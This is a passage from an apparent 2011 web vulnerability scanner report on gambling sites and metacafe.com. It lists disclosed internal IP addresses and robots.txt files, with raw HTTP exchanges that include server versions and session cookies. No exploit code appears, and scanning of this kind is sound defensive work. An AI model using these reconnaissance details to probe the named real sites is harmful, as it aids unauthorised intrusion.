var ClickTaleSSL=1;
ClickTaleFetchFrom="https://172.17.101.102//en/ClickTaleCache.ashx?t=c0f27dd7787cee9387bb12f1b6216737e55abc4d";
if(typeof ClickTale=='function') ClickTale(29707,1,"www");
</script>
...[SNIP]...

22.48. https://www.interwetten.com/en/casino/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/en/casino/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.17.101.102

Request

Response

22.49. https://www.interwetten.com/en/games/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/en/games/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.17.101.102

Request

Response

22.50. https://www.interwetten.com/en/online-skillgames previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/en/online-skillgames

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.17.101.102

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:41:30 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:41:30 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:41:29 GMT
Connection: close
Content-Length: 75500
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head
...[SNIP]...
<script type="text/javascript">
var ClickTaleSSL=1;
ClickTaleFetchFrom="https://172.17.101.102//en/ClickTaleCache.ashx?t=56170aa6ad8875d2366cd7bfc005ba097df980a9";
if(typeof ClickTale=='function') ClickTale(29707,1,"www");
</script>
...[SNIP]...

22.51. https://www.interwetten.com/en/scratch/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/en/scratch/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.17.101.102

Request

Response

22.52. https://www.interwetten.com/en/skill/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/en/skill/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.17.101.102

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:40:06 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:40:06 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:40:05 GMT
Content-Length: 75595
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head
...[SNIP]...
<script type="text/javascript">
var ClickTaleSSL=1;
ClickTaleFetchFrom="https://172.17.101.102//en/ClickTaleCache.ashx?t=95e5f4ac8035a9e72538f20064ff8bcaea242c56";
if(typeof ClickTale=='function') ClickTale(29707,1,"www");
</script>
...[SNIP]...

22.53. https://www.interwetten.com/es/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/es/Default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.17.101.102

Request

GET /es/Default.aspx HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: /sportsbook/default.aspx
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=es; expires=Sun, 16-May-2021 12:42:15 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:42:15 GMT
Content-Length: 911
Connection: close
Vary: Accept-Encoding

<html><head><title>Object moved</title></head><body>
<script type="text/javascript">
var WRInitTime=(new Date()).getTime();
</script>

...[SNIP]...
<script type="text/javascript">
var ClickTaleSSL=1;
ClickTaleFetchFrom="https://172.17.101.102//en/ClickTaleCache.ashx?t=ce3568f5fc5ca50c1baee5dbbef5003bdc708672";
if(typeof ClickTale=='function') ClickTale(29707,1,"www");
</script>
...[SNIP]...

22.54. https://www.interwetten.com/fr/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/fr/Default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.17.101.102

Request

GET /fr/Default.aspx HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: /sportsbook/default.aspx
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=fr; expires=Sun, 16-May-2021 12:42:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:42:12 GMT
Content-Length: 911
Connection: close
Vary: Accept-Encoding

<html><head><title>Object moved</title></head><body>
<script type="text/javascript">
var WRInitTime=(new Date()).getTime();
</script>

...[SNIP]...
<script type="text/javascript">
var ClickTaleSSL=1;
ClickTaleFetchFrom="https://172.17.101.102//en/ClickTaleCache.ashx?t=1482a78c0111dc0c8401cabb0bb466b53aeb34be";
if(typeof ClickTale=='function') ClickTale(29707,1,"www");
</script>
...[SNIP]...

22.55. https://www.interwetten.com/it/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/it/Default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.17.101.102

Request

GET /it/Default.aspx HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: /sportsbook/default.aspx
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=it; expires=Sun, 16-May-2021 12:42:17 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:42:17 GMT
Content-Length: 911
Connection: close
Vary: Accept-Encoding

<html><head><title>Object moved</title></head><body>
<script type="text/javascript">
var WRInitTime=(new Date()).getTime();
</script>

...[SNIP]...
<script type="text/javascript">
var ClickTaleSSL=1;
ClickTaleFetchFrom="https://172.17.101.102//en/ClickTaleCache.ashx?t=7f9e8db93092e23bcb485cf8c5f9a4bde18a2512";
if(typeof ClickTale=='function') ClickTale(29707,1,"www");
</script>
...[SNIP]...

22.56. https://www.interwetten.com/pt/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/pt/Default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.17.101.102

Request

GET /pt/Default.aspx HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: /sportsbook/default.aspx
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=pt; expires=Sun, 16-May-2021 12:43:05 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:43:05 GMT
Content-Length: 911
Connection: close
Vary: Accept-Encoding

<html><head><title>Object moved</title></head><body>
<script type="text/javascript">
var WRInitTime=(new Date()).getTime();
</script>

...[SNIP]...
<script type="text/javascript">
var ClickTaleSSL=1;
ClickTaleFetchFrom="https://172.17.101.102//en/ClickTaleCache.ashx?t=f580a09747be9643890852eaf55aa6bf3c4fb065";
if(typeof ClickTale=='function') ClickTale(29707,1,"www");
</script>
...[SNIP]...

22.57. https://www.interwetten.com/tr/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/tr/Default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.17.101.102

Request

GET /tr/Default.aspx HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: /sportsbook/default.aspx
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=tr; expires=Sun, 16-May-2021 12:43:10 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:43:10 GMT
Content-Length: 911
Connection: close
Vary: Accept-Encoding

<html><head><title>Object moved</title></head><body>
<script type="text/javascript">
var WRInitTime=(new Date()).getTime();
</script>

...[SNIP]...
<script type="text/javascript">
var ClickTaleSSL=1;
ClickTaleFetchFrom="https://172.17.101.102//en/ClickTaleCache.ashx?t=6c15a9a59fdf976137434df6114c679a0451036d";
if(typeof ClickTale=='function') ClickTale(29707,1,"www");
</script>
...[SNIP]...

22.58. http://www.metacafe.com/fplayer/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.metacafe.com
Path:	/fplayer/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.16.176.198

Request

GET /fplayer/ HTTP/1.1
Host: www.metacafe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI CUR ADM OUR NOR STA NID"
Content-Type: text/html
Date: Mon, 16 May 2011 12:25:14 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=b34cef86fb081c11b18f1c7533ccdcf4; path=/; domain=.metacafe.com
Set-Cookie: OAGEO=US%7CTX%7CDallas%7C75207%7C32.7825%7C-96.8207%7C623%7C214%7C%7C%7C; path=/; domain=.metacafe.com
Set-Cookie: OAID=b26d5505ed27474ffea988f3d3dd0b02; expires=Tue, 15-May-2012 12:25:14 GMT; path=/; domain=.metacafe.com
Set-Cookie: User=%7B%22sc%22%3A1%2C%22visitID%22%3A%228744ed5d828ea0d23416bbe1e22d1055%22%2C%22LEID%22%3A40%2C%22LangID%22%3A%22en%22%2C%22npUserLocations%22%3A%5B244%5D%2C%22npUserLanguages%22%3A%5B9%5D%2C%22ffilter%22%3Atrue%2C%22pve%22%3A1%2C%22fbconnected%22%3Afalse%7D; expires=Sat, 14-May-2016 12:25:14 GMT; path=/; domain=.metacafe.com
Set-Cookie: dsavip=3333427372.20480.0000; expires=Mon, 16-May-2011 13:25:14 GMT; path=/
Content-Length: 73965

           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
           <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
tp:') {
                   iOmnitureMC = new OmnitureMC({"serverName":"256868-web52.metacafe.com","maxFlashVersion":"9","eVar1":"not logged-in","eVar2":"family filter on","prop1":40,"prop2":"C=244 L=9","server":"172.16.176.198","events":null,"prop46":"KPI-fplayer","pageName":"Metacafe homepage","channel":"Home","prop28":"3","prop34":"3"}, {"WikiRecentChanges":{"events":"event67"}});
               }
           }catch(e){}
    </script>
...[SNIP]...

23. Robots.txt file previous next
There are 101 instances of this issue:

http://ad-emea.doubleclick.net/ad/N5493.Ok/B4240999.6
http://ad.doubleclick.net/N6707/adj/meta.homepage/adminMsg
http://api.twitter.com/1/Metacafe/lists/metacafe/statuses.json
http://b.scorecardresearch.com/b
https://bingo.betsson.com/en/
http://blog.crazyscratch.com/
http://blog.deconcept.com/swfobject/
http://blog.postcodelottery.com/
http://blog.primescratchcards.co.uk/
http://br.winnings.com/
http://c.betrad.com/a/n/581/1296.js
http://creativecommons.org/licenses/by-sa/2.5/br/deed.en_US
http://d.tradex.openx.com/afr.php
http://d.xp1.ru4.com/um
http://da.crazyscratch.com/
http://da.winnings.com/
http://de.crazyscratch.com/
http://de.winnings.com/
http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
http://download.neogames-tech.com/Brands/MundiRasca/Website/General/BottomMenuBG.jpg
https://download.neogames-tech.com/chat/chatstart.aspx
http://el.crazyscratch.com/
http://el.winnings.com/
http://en.crazyscratch.com/
http://es.crazyscratch.com/
http://es.winnings.com/
http://feeds.bbci.co.uk/news/rss.xml
http://fi.crazyscratch.com/
http://fi.winnings.com/
http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
http://fr.crazyscratch.com/
http://fr.winnings.com/
http://getclicky.com/66384109
http://gmpg.org/xfn/11
http://go.microsoft.com/fwlink/
http://it.crazyscratch.com/
http://itunes.apple.com/us/app/pclottery/id399201446
http://jquery.org/license
http://leandrovieira.com/projects/jquery/lightbox/
http://m.xp1.ru4.com/ad
http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml
http://nl.crazyscratch.com/
http://nl.winnings.com/
http://no.crazyscratch.com/
http://no.winnings.com/
http://pagead2.googlesyndication.com/pagead/imgad
http://pixel.invitemedia.com/data_sync
http://pixel.quantserve.com/pixel
http://pt.crazyscratch.com/
http://pt.winnings.com/
http://pubads.g.doubleclick.net/pagead/adview
http://s.mcstatic.com/Images/Studios/videogame/ChannelLogo.jpg
http://s0.2mdn.net/879366/flashwrite_1_2.js
http://s1.mcstatic.com/JS12/Home/
http://s3.mcstatic.com/thumb/6373642/18140891/4/videos/2/1/the_cleveland_show_karate_season_2.jpg
http://s4.mcstatic.com/CSS/Global/
http://s6.mcstatic.com/thumb/6289097/17948388/4/videos/0/1/l_a_noire_gameplay_series_3.jpg
http://safebrowsing.clients.google.com/safebrowsing/downloads
http://scratch.co.uk/
http://spe.atdmt.com/ds/AAAVEWEWAWWA/20110413_WWA_Sp11_X1_NewCreative/WWA_Sp11_X1_Online_Fingertips_300x250.gif
http://static.ak.fbcdn.net/connect/xd_proxy.php
http://sv.crazyscratch.com/
http://sv.winnings.com/
http://twitter.com/ukscratch
http://va.px.invitemedia.com/goog_imp
http://video.google.com/googleplayer.swf
http://winnings.com/wp-content/plugins/google-analyticator/external-tracking.min.js
http://winter.metacafe.com/Openx/www/delivery/lg.php
http://www.adobe.com/go/getflashplayer
http://www.apple.com/qtactivex/qtplugin.cab
https://www.aspireaffiliates.com/
https://www.betsson.com/core/StartPlaying/Scripts/Compiled/StartPlayingApi.js
http://www.clickandbuy.com/WW_en/payment/index.html
http://www.crazyscratch.com/
http://www.facebook.com/WinningsCom
http://www.gambleaware.co.uk/
http://www.gamblersanonymous.org.uk/
http://www.gamcare.org.uk/
http://www.google-analytics.com/__utm.gif
http://www.heavenaffiliates.com/
https://www.interwetten.com/
http://www.itechlabs.com.au/
http://www.lga.org.mt/lga/content.aspx
http://www.metacafe.com/fplayer/
http://www.national-lottery.co.uk/
http://www.nedstat.com/terms.html
https://www.neogamespartners.com/
http://www.opensource.org/licenses/mit-license.php
http://www.paysafecard.com/
http://www.postcodelottery.com/FunGames/PaidGames/PostcodeLotteryScratch.htm
https://www.postcodelottery.com/PlayNOW/OrderYourTickets.htm
http://www.thawte.com/
https://www.thawte.com/
http://www.trustlogo.com/ttb_searcher/trustlogo
http://www.tstglobal.com/
http://www.ukash.com/
http://www.verisign.co.uk/
http://www.vincite.net/
http://www.winnings.com/
http://www.youtube.com/v/

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

23.1. http://ad-emea.doubleclick.net/ad/N5493.Ok/B4240999.6 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad-emea.doubleclick.net
Path:	/ad/N5493.Ok/B4240999.6

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad-emea.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 16:31:04 GMT
Date: Mon, 16 May 2011 11:41:05 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /

23.2. http://ad.doubleclick.net/N6707/adj/meta.homepage/adminMsg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/N6707/adj/meta.homepage/adminMsg

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 15:31:04 GMT
Date: Mon, 16 May 2011 12:49:31 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /

23.3. http://api.twitter.com/1/Metacafe/lists/metacafe/statuses.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.twitter.com
Path:	/1/Metacafe/lists/metacafe/statuses.json

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: api.twitter.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:49:37 GMT
Server: Apache
Vary: Host,Accept-Encoding
Set-Cookie: k=173.193.214.243.1305550177720905; path=/; expires=Mon, 23-May-11 12:49:37 GMT; domain=.twitter.com
Last-Modified: Wed, 04 May 2011 17:32:26 GMT
Accept-Ranges: bytes
Content-Length: 26
Cache-Control: max-age=86400
Expires: Tue, 17 May 2011 12:49:37 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

23.4. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 06 Jan 2010 17:35:59 GMT
Content-Length: 28
Content-Type: text/plain
Expires: Tue, 17 May 2011 12:49:29 GMT
Date: Mon, 16 May 2011 12:49:29 GMT
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

User-agent: *
Disallow: /

23.5. https://bingo.betsson.com/en/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://bingo.betsson.com
Path:	/en/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: bingo.betsson.com

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: text/plain
Expires: Tue, 17 May 2011 10:56:47 GMT
Last-Modified: Wed, 12 Jan 2011 16:05:16 GMT
Accept-Ranges: bytes
ETag: "1CBB27280604600"
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:58:53 GMT
Connection: close
Content-Length: 594

...User-agent: *
Disallow: /en/XmlData/
Disallow: /sv/XmlData/
Disallow: /fi/XmlData/
Disallow: /da/XmlData/
Disallow: /de/XmlData/
Disallow: /no/XmlData/
Disallow: /it/XmlData/
Disallow: /cs/
...[SNIP]...

23.6. http://blog.crazyscratch.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.crazyscratch.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: blog.crazyscratch.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.2.13
Set-Cookie: _icl_current_language=en; expires=Tue, 17-May-2011 12:32:01 GMT; path=/
X-Pingback: http://blog.crazyscratch.com/xmlrpc.php
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:32:00 GMT
Connection: close
Content-Length: 24

User-agent: *
Disallow:

23.7. http://blog.deconcept.com/swfobject/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.deconcept.com
Path:	/swfobject/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: blog.deconcept.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:45:17 GMT
Server: Apache
Last-Modified: Sun, 15 Jun 2008 07:52:21 GMT
ETag: "64a2e08-a2-44fafca6f3740"
Accept-Ranges: bytes
Content-Length: 162
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# robots.txt file for deconcept.com and blog.deconcept.com

# general crawlers

User-agent: *
Disallow: /dl
Disallow: /awstats

User-agent: duggmirror
Disallow: /

23.8. http://blog.postcodelottery.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.postcodelottery.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: blog.postcodelottery.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:32:17 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Pingback: http://blog.postcodelottery.com/xmlrpc.php
Content-Length: 81
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://blog.postcodelottery.com/sitemap.xml.gz

23.9. http://blog.primescratchcards.co.uk/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.primescratchcards.co.uk
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: blog.primescratchcards.co.uk

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:37:26 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://blog.primescratchcards.co.uk/xmlrpc.php
Set-Cookie: PHPSESSID=dvfgcrea9la1srqt23sue81ss2; path=/
Last-Modified: Mon, 16 May 2011 12:37:26 GMT
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://blog.primescratchcards.co.uk/sitemap.xml.gz

23.10. http://br.winnings.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://br.winnings.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: br.winnings.com

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=18dfca8j0r01a5vat5695vsob5; path=/; domain=.winnings.com
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
Set-Cookie: winnings[sessionId]=103123656; path=/; domain=.winnings.com
Set-Cookie: winnings[vid]=541029; expires=Tue, 15-May-2012 12:45:44 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:45:43 GMT
Connection: close
Content-Length: 24

User-agent: *
Disallow:

23.11. http://c.betrad.com/a/n/581/1296.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c.betrad.com
Path:	/a/n/581/1296.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: c.betrad.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "9152d7f1724ed8fbcd2e0c87029f193c:1276881254"
Last-Modified: Fri, 18 Jun 2010 17:14:14 GMT
Accept-Ranges: bytes
Content-Length: 25
Content-Type: text/plain
Date: Mon, 16 May 2011 12:52:26 GMT
Connection: close
X-N: S

User-agent: *
Disallow: /

23.12. http://creativecommons.org/licenses/by-sa/2.5/br/deed.en_US previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://creativecommons.org
Path:	/licenses/by-sa/2.5/br/deed.en_US

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: creativecommons.org

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Debian)
Last-Modified: Mon, 28 Feb 2011 21:56:17 GMT
ETag: "3458354-4f-49d5ebfc9c240"
Vary: Accept-Encoding
Content-Type: text/plain
X-Pad: avoid browser bug
Content-Length: 79
Date: Mon, 16 May 2011 12:02:09 GMT
X-Varnish: 406080266 406072227
Age: 83
Via: 1.1 varnish
Connection: close

User-agent: *
Disallow: /wp-admin
Disallow: /wp-includes
Disallow: /wp-content

23.13. http://d.tradex.openx.com/afr.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.tradex.openx.com
Path:	/afr.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: d.tradex.openx.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:52:09 GMT
Server: Apache
Last-Modified: Tue, 21 Dec 2010 00:56:43 GMT
ETag: "42be70-131-497e11c2d28c0"
Accept-Ranges: bytes
Content-Length: 305
Connection: close
Content-Type: text/plain; charset=UTF-8

# This robots.txt file requests that search engines and other
# automated web-agents don't try to index the files in this
# directory (/www/delivery/). This file is required in the
# event that you us
...[SNIP]...

23.14. http://d.xp1.ru4.com/um previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.xp1.ru4.com
Path:	/um

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: d.xp1.ru4.com

Response

23.15. http://da.crazyscratch.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://da.crazyscratch.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: da.crazyscratch.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 21 Jan 2011 08:47:20 GMT
Accept-Ranges: bytes
ETag: "d05dbfd047b9cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:31:58 GMT
Connection: close
Content-Length: 28

User-agent: *
Disallow: /

23.16. http://da.winnings.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://da.winnings.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: da.winnings.com

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=n9dek1nvr97u53o6m63skgb9l7; path=/; domain=.winnings.com
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
Set-Cookie: winnings[sessionId]=103123291; path=/; domain=.winnings.com
Set-Cookie: winnings[vid]=540668; expires=Tue, 15-May-2012 12:26:30 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:26:30 GMT
Connection: close
Content-Length: 24

User-agent: *
Disallow:

23.17. http://de.crazyscratch.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://de.crazyscratch.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: de.crazyscratch.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 21 Jan 2011 08:47:29 GMT
